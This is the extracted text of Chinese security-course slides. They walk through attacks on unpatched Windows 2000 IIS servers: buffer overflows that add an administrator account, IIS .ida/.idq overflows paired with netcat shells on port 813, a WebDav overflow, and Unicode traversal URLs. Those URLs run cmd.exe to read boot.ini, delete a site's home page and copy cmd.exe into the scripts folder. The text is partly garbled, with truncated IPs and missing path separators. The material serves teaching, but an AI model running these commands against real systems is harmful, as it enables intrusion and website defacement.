计算机安全教程ppt课件,计算机网络安全教程幻灯片课件.ppt

计算机网络安全教程幻灯片课件.ppt

检查缓冲区溢出漏洞 利用缓冲区溢出漏洞攻击 利用工具软件attack.exe对09进行攻击。攻击的结果将在对方计算机上建立一个具有管理员权限的用户，并终止了对方的RPC服务。 新建用户的用户名和密码都是qing10，这样就可以登录对方计算机了，RPC服务停止操作系统将有许多功能不能使用，非常容易被管理员发现，使用工具软件OpenRpcSs.exe来给对方重启RPC服务。攻击的全过程如图5-37所示。 攻击的全过程 IIS溢出原理 IIS缓冲区溢出 IIS：windows系统上最不安全的服务 ISAPI提供对管理脚本(.ida文件)和Inernet数据(.idq)查询的支持 向idq.dll发送一个过量的变量 GET /null.ida[buffer]=X HTTP/1.1 Host: [任意值] 一些具体的攻击方法没有公开 Code Red蠕虫利用了这一漏洞 2 利用IIS溢出进行攻击 案例5-11 利用IIS溢出入侵系统 利用软件Snake IIS溢出工具可以让对方的IIS溢出，还可以捆绑执行的命令和在对方计算机上开辟端口，工具软件的主界面如图5-38所示。 2 该软件适用于各种类型的操作系统，比如对09进行攻击，09的操作系统的Windows 2000，没有安装补丁程序，攻击完毕后，开辟一个813端口，并在对方计算机上执行命令“dir c:”设置如图5-39所示。 利用IIS溢出进行攻击 2 点击按钮“IDQ溢出”，出现攻击成功的提示框，如图5-40所示。 2 利用IIS溢出进行攻击 这个时候，813端口已经开放，利用工具软件nc.exe连接到该端口，将会自动执行刚才发送的DOS命令“dir c:”，使用的语法是：nc.exe -vv 09 813，其中-vv是程序的参数，813是目标端口。可以看到命令的执行结果，如图5-41所示。 利用IIS溢出进行攻击 2 监听本地端口 下面利用nc.exe和snake工具的另外一种组合入侵对方计算机。首先利用nc.exe命令监听本地的813端口。使用的基本语法是“nc -l -p 813”，执行的过程如图5-42所示。 这个窗口就这样一直保留，启动工具软件snake，本地的IP地址是10，要攻击的计算机的IP地址是09，选择溢出选项中的第一项，设置IP为本地IP地址，端口是813，如图5-43所示。 监听本地端口 设置好以后，点击按钮“IDQ溢出”，程序显示对话框如图4-44所示。 监听本地端口 查看nc命令的DOS框，在该界面下，已经执行了设置的DOS命令。将对方计算机的C盘根目录列出来，如图4-45所示。 监听本地端口 IIS默认提供了对WebDav的支持，通过WebDav可以通过HTTP向用户提供远程文件存储的服务。但是WebDav使用了ntDll.dll函数，这个函数对在长度检查中存在一个整数溢出问题，可以利用此漏洞获取权限。 WebDav远程溢出原理 3 需要使用工具软件nc.exe和webdavx3.exe，首先在DOS命令行下执行webdavx3.exe，如果执行的话，该程序将提示已经过期了，如图4-46所示。 利用WebDav远程溢出 3 利用Unicode漏洞读取系统盘目录 利用Unicode漏洞读取系统盘目录 利用语句得到对方计算机上装了几个操作系统以及操作系统的类型，只要读取C盘下的boot.ini文件就可以了。使用的语句是： 09/scripts/..%c0%2f../winnt/system32/cmd.exec+type+c:boot.ini 执行的结果如图5-22所示。 使用Unicode漏洞删除主 2 利用Unicode可以方便的更改对方的主页，比如现在已经知道对方网站的根路径在“C:Initpubwwwroot”(系统默认)下，可以删除该路径下的文件“default.asp”来删除主页，这里的“default.asp”文件是IIS的默认启动页面。 使用的语句是： 09/scripts/..%c0%2f../winnt/system32/cmd.exec+del+c:inetpubwwwrootdefault.asp 使用Unicode漏洞删除主 2 拷贝文件 为了是使用方便，利用语句将cmd.exe文件拷贝到scripts目录，并改名为c.exe，使用的语句是： 09/scripts/..%c0%2f../winnt/system32/cmd.exec+copy+C:winntsystem32cmd.exe+c.exe 程序执行结果如图5-24所示。 查看C盘的目录 以后使用cmd.exe命令就方便了，比如查看C盘的目录，使用的语句就可以简化为： 09/scripts/c.exec+dir+c

文章知识点与官方知识档案匹配，可进一步学习相关知识网络技能树首页概览22399 人正在系统学习中 相关资源：凯歌软件安装管理器1.0-其它文档类资源-CSDN文库

来源：柯家凯MM